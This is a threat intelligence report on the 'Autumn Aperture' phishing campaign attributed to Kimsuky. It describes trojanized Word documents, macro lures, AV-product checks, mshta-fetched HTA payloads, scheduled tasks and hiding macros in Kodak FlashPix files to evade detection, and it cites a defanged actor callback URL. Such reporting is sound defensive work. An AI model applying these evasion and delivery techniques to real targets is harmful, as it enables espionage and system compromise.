11 September 2019
Autumn Aperture: Threat Campaign Highlights New Evasion Technique using an Antiquated File Format
In what is assessed to be an expansion of a coordinated effort to target U.S.-based entities, an emerging and increasingly sophisticated campaign employing obscure file formats poses significant risk — and highlights the need for vigilance around third-party relations.
After detecting several related trojanized documents — all discussing nuclear deterrence, North Korea’s nuclear submarine program, and North Korean economic sanctions — Prevailion has determined the existence of a coordinated threat campaign. We have dubbed the campaign “Autumn Aperture” and have associated it — with moderate confidence — to the Kimsuky, a.k.a. “Smoke Screen”, threat actors.
To increase the effectiveness of their campaign, the threat actors obtained documents written by industry experts. The threat actors then appended their malware into these Microsoft Word files. Document metadata indicates that these operations occurred throughout the summer of 2019 with the most recent wave of documents likely being sent around 20 August 2019.
This campaign also denoted an evolution in the threat actors’ techniques, as they shifted to more obscure file formats (Kodak FlashPix), resulting in a significantly lower detection rate by anti-virus (AV) products.
We hypothesize that these documents, sent via a socially engineered email, would have likely been anticipated by the intended victims, thus increasing the threat actors’ chance of success. Some document examples include:
- Trojanizing a conference speaker’s notes after his presentation at Nuclear Deterrence summit.
- Trojanizing a report from a U.S. university affiliate discussing North Korea’s new ballistic missile submarine (SSB) capabilities.
- Impersonating the U.S. Department of Treasury and sending a renewal notice for a sanctions license.
Autumn Aperture’s increasingly sophisticated tools still employ the use of a common email threat delivery mechanism that can be incorporated into an organization’s risk mitigation plans. Given the scope of entities targeted by this campaign, there is an increased likelihood that a third party within an organization’s ecosystem is at risk of exposure.
Based on the indicators of compromise we’ve collected on Autumn Aperture, we encourage organizations to assess existing risk profiles, review emergency response plans, and ensure that employees know to immediately contact the appropriate IT or network security resource if they are prompted to enable macros on any document.
The most recent document associated with this campaign was titled “NK new SSB shown with Kim 22-7-2019”. Document metadata shows that this document was created by a U.S. based university affiliate and, despite its title, was modified on 20 August by the threat actors.
Consistent with historical trends, the threat actors continued to trojanize genuine documents. Throughout this campaign, when victims viewed the documents in an application, the malware would display a prompt to enable macros. Once macros were enabled, the document would then display the content — in this case, a report on the construction of a new ballistic missile submarine (SSB) facility — while surreptitiously installing additional malware on the victim’s computer.
SSB phishing lure used to target victims
We also discovered another malicious document, likely deployed earlier this summer. This document used the same technique embedding images with instructions to enable macros.
Once macros were enabled, the user would see a document that appeared to be from the U.S. Treasury Department, which granted the Carnegie Corporation of New York a sanctions license. As before, enabling macros allowed the malware to install additional payloads on the victim’s computer.
North Korea sanctions regulations lure
In one particular case, we identified a Bitly link that was sent to some victims of this campaign. When the Bitly link was expanded, it revealed the shortened actor-controlled URL. Additionally, this expansion page showed how many people clicked the link and when it was clicked. If a victim visited the URL, the resulting webpage would download a file rar, which contained a trojanized document summarizing a talk from the Nuclear Deterrence summit.
While we observed multiple iterations of this lure, metadata shows that the original document was created by a speaker at the Nuclear Deterrence Summit
and then modified by the threat actors. The content of this lure suggests that it was likely targeted towards conference attendees and/or others who had an interest in what took place at the conference.
This particular document was previously referenced in a report by ESTSecurity
, and its embedded domain was included in a report
by the Agence Nationale de la Sécurité des Systèmes d’Information (ANSSI). This indicates that the Autumn Aperture campaign was likely a continuation of a previously reported activity from this threat group.
Nuclear Deterrence summit lure
Visual Basic Scripts and Kodak FlashPix Format Files
Earlier in 2019, the trojanized documents contained a very small, simple macro that would automatically open, then call mshta.exe to run an executable HTML (HTA) file. The threat actors have since fortified their documents with several new functionalities, such as an added feature to enumerate the host machine and experimented with password protecting their documents.
Another feature would call Windows Management Instrumentation (WMI) to determine if it was safe to obtain the next payload on the host machine. The dropper would obtain a list of running processes and services, then compare that output to a list of known anti-virus products. In July, the script would check for the presence of the following anti-virus products:
- Malware Bytes
- WIndows Defender
In August, the threat actors added functionality to also check for:
Screenshot of the anti-detection checks used in the July Campaign
Once the dropper determined that it was safe to run on the host machine, it would perform some host-based enumeration by attempting to obtain stored credentials. As in earlier campaigns, the dropper would use mshta.exe to obtain the HTA payloads hosted on compromised domains. The executable would be saved in %APPDATA%tmp0.bat. The script would then create a scheduled task to run the payload using wscript.exe.
The last new feature of the script would attempt to obtain the application’s version number — in most cases this would likely be the version of Microsoft Word — and then send the result to another actor-compromised domain, pirha[.]net/p/php?op=[version number].
Screenshot of the application version feature
To hide this new functionality, the threat actor embedded it in a Kodak FlashPix file format (FPX). According to VirusTotal testing, the FPX file format has a significantly lower dectection rate, dropping the initial detection rate to 8/57 AV products. Whereas the standard file format, VBA, had an initial detection rate of 23/57.
Screenshot of the FPX detection rate on 23 July 2019
Screenshot of the VBA detection rate on 9 June 2019
This was likely done as AV products have numerous signatures designed to inspect VBA files; while FPX files have not received the same level of scrutiny. As a result, FPX files are less likely to be subsequently flagged as malicious. We found samples suggesting that the threat actors have been using this file format since at least July.
These threat actors’ TTPs are evolving and continue to be refined with each new operation. While this type of operation did require some user interaction (pressing the macro button), the malware would do the rest in the background, hidden from the victim.
This technique followed a wider trend that we are observing across multiple threat actor groups, in which they socially engineer victims with an image rather than relying on an exploit. Several actors are creating more robust droppers to better protect their tool sets and increase their chances of operating without discovery. These changes reflect a highly motivated threat actor, likely to continue performing operations.
While the TTPs continue to evolve and increase in sophistication, this campaign still relies on a relatively simple but effective email fraud attack method. Business email compromise (BEC) — the traditional document delivery method used for campaign Autumn Aperture — is the leading driver for insurance giant AIG’s Europe, Middle East & Africa (EMEA) region cyber insurance claims.
BEC compromises are a growing threat, up from 11% of AIG EMEA’s reported cyber claims in 2017 to account for 23% in 2018. AIG EMEA’s 2018 cyber claims data indicates a wide range of sectors are vulnerable to BEC attacks, with professional services, financial services, business services, and public entity & non-profit industries accounting for almost 60% of all 2018 claims.
Given the broad scope of entities targeted by Autumn Aperture, there is an increased likelihood that a third party within an organization’s ecosystem is at risk of exposure. Based on this information and the indicators of compromise Prevailion has collected on Autumn Aperture, we encourage organizations to assess existing risk profiles, review emergency response plans, and ensure that employees know to immediate contact the appropriate IT or network security resource if prompted to enable macros on a downloaded document. For more information about threat modeling and 3rd party risk mitigation, attending Elizabeth’s talk on September 12th at the Tactical Edges International CISOs Summit. (1)
(1) Cyber Claims: GDPR and business email compromise drive greater frequencies; https://www.aig.co.uk/content/dam/aig/emea/regional-assets/documents/aig-cyber-claims-2019.pdf
Prevailion is a compromise intelligence company, transforming the way organizations approach risk mitigation and business decision-making. Through next-level tailored intelligence and a zero-touch platform, Prevailion provides confirmed evidence of compromise for customers and their partner ecosystems.